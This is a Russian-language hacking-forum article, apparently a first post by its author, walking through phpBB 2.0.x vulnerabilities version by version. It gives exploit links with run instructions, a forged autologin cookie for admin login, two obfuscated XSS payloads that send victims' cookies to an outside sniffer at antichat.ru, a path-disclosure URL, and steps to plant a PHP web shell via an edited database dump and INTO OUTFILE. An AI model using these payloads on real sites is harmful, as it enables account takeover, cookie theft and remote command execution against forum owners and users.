Цель : просмотр содержимого файлов на сервере

Описание: Была выпущена в 2002. Данная версия почти не присутствует в сети.
Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP.

Exploit: http://milw0rm.com/id.php?id=47

Цель : просмотр hash'a пароля

Описание: Выпущена в 2002. Также редкая версия.
Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в при обработке $topic_id. Возможно добавить 2 запрос, тем самым захватить хэш.

Exploit: http://milw0rm.com/id.php?id=44
При запуске $remote = shift || 'localhost'; - изменяем на нужный например 255.255.255.255, $uid = shift || 2; - ID нужного нам пользователя. В форумах phpBB ID администратора по умолчанию "2". Затем пишем "perl exp.pl"

Video: -

Цель : просмотр hash'a пароля

Описание: Выпущена в 2002. Также редкая версия.
Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в модуле search.php.

Exploit: http://milw0rm.com/id.php?id=137
Запускаем "perl exp.pl "
Где - ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать "ping test.com"), - папка где находится сам форум (например если у нас http://123.123.123.123/forum/index.php, вместо пишем forum), - ID пользователя.

Video: http://video.antichat.net/videos/kez/phpbb_206_sql2.rar

Цель : (1) Выполение произвольных команд.

Описание: Была выпущена так же в 2002. Данная версия встречается намного чаще, чем младшие. Но реже чем старшие =). Был произведён дефейс сайта phpbb.com, с помощью найденной уязвимости в этой версии.
Описание уязвимости: Некорректная обработка входных параметров в viewtopic.php.

Exploit: http://milw0rm.com/id.php?id=647 Запускать "perl exp.pl [*URL] [DIR] [NUM] [CMD]"
Где [*URL] - урл сайта (например http://www.test.com), [DIR] - директория в которой находится форум(например /forum/ или /forum), [NUM] - номер топика (обязательно существующего), [CMD] - команда которую следует выполнить (например ls -la, справочник всех команд *nix http://forum.antichat.ru/threadnav7345-1-10.html)

Video: -
Цель : (2) Попадание в админку обходя ограничения.

Описание: -
Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP.

Exploit: В архиве с видео =)

Video: http://video.antichat.net/videos/wizi/vhackbbshwizi.rar

Цель : Вход на форум аккаунтом администратора.

Описание: -
Описание уязвимости: Для начала нам следует зарегаться на форуме. Затем, войти под своим аккаунтом и если стоит галка "Автоматический вход",то убрать её. Нам нужно отредактировать кукисы (посоветую делать это в опере Tools->Advanced->Cookies),
вместо

Цитата:
<br /> a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D

X - наш ID ,
а меняем на

Цитата:
<br /> a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

2 - как уже говорилось выше, ID админа

Exploit:
"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"

Video: -

Цель : просмотр hash'a пароля, любого пользователя

Описание: -
Описание уязвимости: Уязвимость присутствует в модуле downloads.php. Есть возможность SQL инъекции

Exploit: http://milw0rm.com/id.php?id=907
Запускать "perl exp.pl < site> < dir> < id>"
Где < site> URL сайта < dir> - директория < id> - нужный нам пользователь

Video: -

Цель : получение Имя,Логина, Пароля от БД.

Описание: -
Описание уязвимости: Уязвимость пристутствует в модуле viewtopic.php.

Exploit: http://milw0rm.com/id.php?id=1080 Запускать "perl exp.pl < server> < dir> < id> \r\n"
Где < server> - ip сервера, < dir> - директория в которой находится форум < id> номер существующего топика.

Video: -

Цель : получение hash'a пароля пользователя

Описание: -
Описание уязвимости: В данной версии присутствует XSS (Cross Site Scripting более подробно про XSS можно почитать тут http://antichat.ru/txt/xssoverview/ или http://ha.ckers.org/xss.html), которая получить кукисы. Они высылаются на сниффер,
логи которого можно посмотреть здесь http://antichat.ru/sniff/log.php.

Exploit:

Код:

[*color=#EFEFEF][*url]www.ut[*url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
Video: -

Цель : выполнение произвольных команд на сервере(php-inj)

Описание: -
Описание уязвимости: В данной версии присутствует уязвимость в модуле profile.php.

Exploit: http://rst.void.ru/download/r57phpbb2017.txt Запускать "perl exp.pl "
Где - ссылка до форума например http://site.com/phpBB/, - нужная команда (о командах читаем тут http://forum.antichat.ru/threadnav7345-1-10.html).

Video: -

Цель: получение hash'a пароля пользователя

Описание: найдена WJ (White Jordan =)
Описание уязвимости: В данной версии присутствует XSS.

Exploit:

Код:
<br /> [UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL] <br />

Что бы воспользоваться сплойтом убираем плюсы между символами & и #(например было "&+#40" стало -"(")

Video: -

Рассмотрим такой актуальный вопрос как заливка шелла, через форум PHPbb. Если получилось воспользоваться одной из ранее найденных уязвимостей, то остаётся другая проблема - это раскрыть полный путь пример (/home/site/www/phpbb/). Для этого нам следует зайти вот по такой ссылке http://www.site.com/phpbb/admin/admin_disallow.php?setmodules=00. Всё путь раскрыт.Далее заходим в админку и делаем дамп БД, открываем сохранившийся дамп и ищем такую строку:

Цитата:

INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'TEST', '10');

а меняем на

Цитата:

INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? system(GET['cmd']); ?>', '10');

Шелл готов. Теперь, впишем ниже одну строчку )

Цитата:

SELECT cat_title INTO OUTFILE 'раскрытый путь/phpbb/cache/shell.php' FROM phpbb_categories where cat_id=1;

Обычно папка cache доступна для записей. Заливаем БД обратно и заглянем на главную. Далее идём по ссылке http://www.site.com/phpBB/cache/shell.php.

[Итог]

Вроде всё. Сильно не ругаемся, т.к. статья у меня первая. Что не учел, прошу дополняем, что
не верно - дополняем.